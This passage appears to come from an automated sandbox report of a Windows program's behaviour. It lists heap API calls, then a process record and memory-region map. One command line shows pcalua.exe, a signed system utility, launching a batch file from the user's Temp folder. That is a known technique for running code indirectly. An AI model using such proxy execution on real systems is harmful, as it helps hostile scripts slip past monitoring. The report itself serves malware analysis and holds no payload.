[0373.712] GetProcessHeap () returned 0x410000
[0373.712] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427970) returned 0x20
[0373.713] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427970 | out: hHeap=0x410000) returned 1
[0373.713] GetProcessHeap () returned 0x410000
[0373.713] GetProcessHeap () returned 0x410000
[0373.713] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427d30) returned 1
[0373.713] GetProcessHeap () returned 0x410000
[0373.713] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427d30) returned 0x20
[0373.714] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427d30 | out: hHeap=0x410000) returned 1
[0373.714] GetProcessHeap () returned 0x410000
[0373.714] GetProcessHeap () returned 0x410000
[0373.714] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427d60) returned 1
[0373.714] GetProcessHeap () returned 0x410000
[0373.714] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427d60) returned 0x20
[0373.715] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427d60 | out: hHeap=0x410000) returned 1
[0373.715] GetProcessHeap () returned 0x410000
[0373.715] GetProcessHeap () returned 0x410000
[0373.715] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427150) returned 1
[0373.715] GetProcessHeap () returned 0x410000
[0373.715] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427150) returned 0x30
[0373.716] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427150 | out: hHeap=0x410000) returned 1
[0373.716] GetProcessHeap () returned 0x410000
[0373.716] GetProcessHeap () returned 0x410000
[0373.716] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427d90) returned 1
[0373.716] GetProcessHeap () returned 0x410000
[0373.716] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427d90) returned 0x20
[0373.717] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427d90 | out: hHeap=0x410000) returned 1
[0373.717] GetProcessHeap () returned 0x410000
[0373.717] GetProcessHeap () returned 0x410000
[0373.717] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427df0) returned 1
[0373.717] GetProcessHeap () returned 0x410000
[0373.717] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427df0) returned 0x24
[0373.718] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427df0 | out: hHeap=0x410000) returned 1
[0373.718] GetProcessHeap () returned 0x410000
[0373.718] GetProcessHeap () returned 0x410000
[0373.718] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427dc0) returned 1
[0373.718] GetProcessHeap () returned 0x410000
[0373.718] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427dc0) returned 0x20
[0373.719] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427dc0 | out: hHeap=0x410000) returned 1
[0373.719] GetProcessHeap () returned 0x410000
[0373.719] GetProcessHeap () returned 0x410000
[0373.719] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x42b7a0) returned 1
[0373.719] GetProcessHeap () returned 0x410000
[0373.719] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x42b7a0) returned 0x4c
[0373.720] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42b7a0 | out: hHeap=0x410000) returned 1
[0373.720] GetProcessHeap () returned 0x410000
[0373.720] GetProcessHeap () returned 0x410000
[0373.720] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427e20) returned 1
[0373.720] GetProcessHeap () returned 0x410000
[0373.720] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427e20) returned 0x20
[0373.721] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427e20 | out: hHeap=0x410000) returned 1
[0373.721] GetProcessHeap () returned 0x410000
[0373.721] GetProcessHeap () returned 0x410000
[0373.721] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x429220) returned 1
[0373.721] GetProcessHeap () returned 0x410000
[0373.721] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x429220) returned 0x18
[0373.722] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429220 | out: hHeap=0x410000) returned 1
[0373.722] GetProcessHeap () returned 0x410000
[0373.722] GetProcessHeap () returned 0x410000
[0373.722] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x4279a0) returned 1
[0373.722] GetProcessHeap () returned 0x410000
[0373.722] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4279a0) returned 0x20
[0373.723] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4279a0 | out: hHeap=0x410000) returned 1
[0373.723] GetProcessHeap () returned 0x410000
[0373.723] GetProcessHeap () returned 0x410000
[0373.723] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x4279d0) returned 1
[0373.723] GetProcessHeap () returned 0x410000
[0373.723] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4279d0) returned 0x20
[0373.723] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4279d0 | out: hHeap=0x410000) returned 1
[0373.724] GetProcessHeap () returned 0x410000
[0373.724] GetProcessHeap () returned 0x410000
[0373.724] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427a00) returned 1
[0373.724] GetProcessHeap () returned 0x410000
[0373.724] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427a00) returned 0x20
[0373.724] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427a00 | out: hHeap=0x410000) returned 1
[0373.724] GetProcessHeap () returned 0x410000
[0373.725] GetProcessHeap () returned 0x410000
[0373.725] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427a30) returned 1
[0373.725] GetProcessHeap () returned 0x410000
[0373.725] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427a30) returned 0x20
[0373.725] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427a30 | out: hHeap=0x410000) returned 1
[0373.726] GetProcessHeap () returned 0x410000
[0373.726] GetProcessHeap () returned 0x410000
[0373.726] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x429240) returned 1
[0373.726] GetProcessHeap () returned 0x410000
[0373.726] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x429240) returned 0x18
[0373.726] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429240 | out: hHeap=0x410000) returned 1
[0373.726] GetProcessHeap () returned 0x410000
[0373.726] GetProcessHeap () returned 0x410000
[0373.726] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427a60) returned 1
[0373.726] GetProcessHeap () returned 0x410000
[0373.727] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427a60) returned 0x20
[0373.727] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427a60 | out: hHeap=0x410000) returned 1
[0373.727] GetProcessHeap () returned 0x410000
[0373.727] GetProcessHeap () returned 0x410000
[0373.727] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427a90) returned 1
[0373.728] GetProcessHeap () returned 0x410000
[0373.728] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427a90) returned 0x20
[0373.728] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427a90 | out: hHeap=0x410000) returned 1
[0373.728] GetProcessHeap () returned 0x410000
[0373.728] GetProcessHeap () returned 0x410000
[0373.728] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427ac0) returned 1
[0373.729] GetProcessHeap () returned 0x410000
[0373.729] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427ac0) returned 0x20
[0373.729] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427ac0 | out: hHeap=0x410000) returned 1
[0373.729] GetProcessHeap () returned 0x410000
[0373.729] GetProcessHeap () returned 0x410000
[0373.730] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427af0) returned 1
[0373.730] GetProcessHeap () returned 0x410000
[0373.730] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427af0) returned 0x20
[0373.730] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427af0 | out: hHeap=0x410000) returned 1
[0373.730] GetProcessHeap () returned 0x410000
[0373.730] GetProcessHeap () returned 0x410000
[0373.731] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427b50) returned 1
[0373.731] GetProcessHeap () returned 0x410000
[0373.731] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427b50) returned 0x20
[0373.731] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427b50 | out: hHeap=0x410000) returned 1
[0373.731] GetProcessHeap () returned 0x410000
[0373.731] GetProcessHeap () returned 0x410000
[0373.732] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427bb0) returned 1
[0373.732] GetProcessHeap () returned 0x410000
[0373.732] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427bb0) returned 0x20
[0373.732] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427bb0 | out: hHeap=0x410000) returned 1
[0373.732] GetProcessHeap () returned 0x410000
[0373.732] GetProcessHeap () returned 0x410000
[0373.733] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427be0) returned 1
[0373.733] GetProcessHeap () returned 0x410000
[0373.733] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427be0) returned 0x20
[0373.733] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427be0 | out: hHeap=0x410000) returned 1
[0373.733] GetProcessHeap () returned 0x410000
[0373.734] GetProcessHeap () returned 0x410000
[0373.734] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427c70) returned 1
[0373.734] GetProcessHeap () returned 0x410000
[0373.734] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427c70) returned 0x20
[0373.734] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427c70 | out: hHeap=0x410000) returned 1
[0373.734] GetProcessHeap () returned 0x410000
[0373.734] GetProcessHeap () returned 0x410000
[0373.735] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427ca0) returned 1
[0373.735] GetProcessHeap () returned 0x410000
[0373.735] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427ca0) returned 0x20
[0373.735] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427ca0 | out: hHeap=0x410000) returned 1
[0373.736] GetProcessHeap () returned 0x410000
[0373.736] GetProcessHeap () returned 0x410000
[0373.736] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x429260) returned 1
[0373.736] GetProcessHeap () returned 0x410000
[0373.736] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x429260) returned 0x18
[0373.736] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429260 | out: hHeap=0x410000) returned 1
[0373.736] GetProcessHeap () returned 0x410000
[0373.736] GetProcessHeap () returned 0x410000
[0373.736] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x427b20) returned 1
[0373.736] GetProcessHeap () returned 0x410000
[0373.736] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x427b20) returned 0x20
[0373.737] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427b20 | out: hHeap=0x410000) returned 1
[0373.737] GetProcessHeap () returned 0x410000
[0373.737] GetProcessHeap () returned 0x410000
[0373.737] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x4291e0) returned 1
[0373.737] GetProcessHeap () returned 0x410000
[0373.738] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4291e0) returned 0x18
[0373.738] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4291e0 | out: hHeap=0x410000) returned 1
[0373.738] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1
[0373.738] exit (_Code=0)
Process:
id = "8"
image_name = "pcalua.exe"
filename = "c:\\windows\\system32\\pcalua.exe"
page_root = "0x163b000"
os_pid = "0xc18"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "3"
os_parent_pid = "0x384"
cmd_line = "pcalua.exe -a \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1638
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1639
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1640
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1641
start_va = 0x190000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 1642
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1643
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1644
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1645
start_va = 0xffe50000
end_va = 0xffe56fff
monitored = 1
entry_point = 0xffe51740
region_type = mapped_file
name = "pcalua.exe"
filename = "\\Windows\\System32\\pcalua.exe" (normalized: "c:\\windows\\system32\\pcalua.exe")
Region:
id = 1646
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1647
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1648
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 1649
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 1650
start_va = 0x210000
end_va = 0x49ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 1651
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1652
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1653
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1654
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1655
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1656
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1657
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1658
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1659
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1660
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1661
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1662
start_va = 0x7fefe1f0000
end_va = 0x7fefef77fff
monitored = 0
entry_point = 0x7fefe26cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1663
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1664
start_va = 0x7fef78e0000
end_va = 0x7fef78fbfff
monitored = 0
entry_point = 0x7fef78ef6ec
region_type = mapped_file
name = "pcaui.dll"
filename = "\\Windows\\System32\\pcaui.dll" (normalized: "c:\\windows\\system32\\pcaui.dll")
Region:
id = 1665
start_va = 0x20000
end_va = 0x21fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1666
start_va = 0x7fefa140000
end_va = 0x7fefa196fff
monitored = 0
entry_point = 0x7fefa141118
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 1667
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1668
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1669
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1670
start_va = 0x7fefc300000
end_va = 0x7fefc4f3fff
monitored = 0
entry_point = 0x7fefc48c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 1671
start_va = 0x7fefc990000
end_va = 0x7fefc99bfff
monitored = 0
entry_point = 0x7fefc991064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1672
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1673
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1674
start_va = 0x7fefa120000
end_va = 0x7fefa131fff
monitored = 0
entry_point = 0x7fefa121050
region_type = mapped_file
name = "aepic.dll"
filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll")
Region:
id = 1675
start_va = 0x74040000
end_va = 0x74042fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sfc.dll"
filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll")
Region:
id = 1676
start_va = 0x7fefa110000
end_va = 0x7fefa11ffff
monitored = 0
entry_point = 0x7fefa111010
region_type = mapped_file
name = "sfc_os.dll"
filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll")
Region:
id = 1677
start_va = 0x7fefbe00000
end_va = 0x7fefbef1fff
monitored = 0
entry_point = 0x7fefbe2ac20
region_type = mapped_file
name = "dui70.dll"
filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll")
Region:
id = 1678
start_va = 0xc0000
end_va = 0xc1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 1679
start_va = 0x7fef93f0000
end_va = 0x7fef946bfff
monitored = 0
entry_point = 0x7fef93f11d4
region_type = mapped_file
name = "wer.dll"
filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")
Region:
id = 1680
start_va = 0x4a0000
end_va = 0x65ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004a0000"
filename = ""
Region:
id = 1681
start_va = 0x210000
end_va = 0x30ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 1682
start_va = 0x3a0000
end_va = 0x49ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003a0000"
filename = ""
Region:
id = 1683
start_va = 0xd0000
end_va = 0xf8fff
monitored = 0
entry_point = 0xd1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1684
start_va = 0x4a0000
end_va = 0x627fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004a0000"
filename = ""
Region:
id = 1685
start_va = 0x650000
end_va = 0x65ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000650000"
filename = ""
Region:
id = 1686
start_va = 0xd0000
end_va = 0xf8fff
monitored = 0
entry_point = 0xd1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1687
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1688
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1689
start_va = 0x660000
end_va = 0x7e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000660000"
filename = ""
Region:
id = 1690
start_va = 0x7f0000
end_va = 0x1beffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007f0000"
filename = ""
Region:
id = 1691
start_va = 0xd0000
end_va = 0xd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "pcalua.exe.mui"
filename = "\\Windows\\System32\\en-US\\pcalua.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\pcalua.exe.mui")
Region:
id = 1692
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1693
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1694
start_va = 0x100000
end_va = 0x100fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 1695
start_va = 0x110000
end_va = 0x111fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000110000"
filename = ""
Region:
id = 1696
start_va = 0x1bf0000
end_va = 0x1e5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001bf0000"
filename = ""
Region:
id = 1697
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1698
start_va = 0x1bf0000
end_va = 0x1dbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001bf0000"
filename = ""
Region:
id = 1699
start_va = 0x1de0000
end_va = 0x1e5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001de0000"
filename = ""
Region:
id = 1700
start_va = 0x1bf0000
end_va = 0x1ccefff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001bf0000"
filename = ""
Region:
id = 1701
start_va = 0x1d40000
end_va = 0x1dbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d40000"
filename = ""
Region:
id = 1702
start_va = 0x7fefbcf0000
end_va = 0x7fefbd07fff
monitored = 0
entry_point = 0x7fefbcf1130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 1703
start_va = 0x1e60000
end_va = 0x1f6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e60000"
filename = ""
Region:
id = 1704
start_va = 0x1f70000
end_va = 0x289ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 1705
start_va = 0x310000
end_va = 0x38cfff
monitored = 0
entry_point = 0x31cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1706
start_va = 0x310000
end_va = 0x38cfff
monitored = 0
entry_point = 0x31cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1707
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1708
start_va = 0x28a0000
end_va = 0x299ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000028a0000"
filename = ""
Region:
id = 1709
start_va = 0x29a0000
end_va = 0x2c6efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1710
start_va = 0x100000
end_va = 0x101fff
monitored = 1
entry_point = 0x0
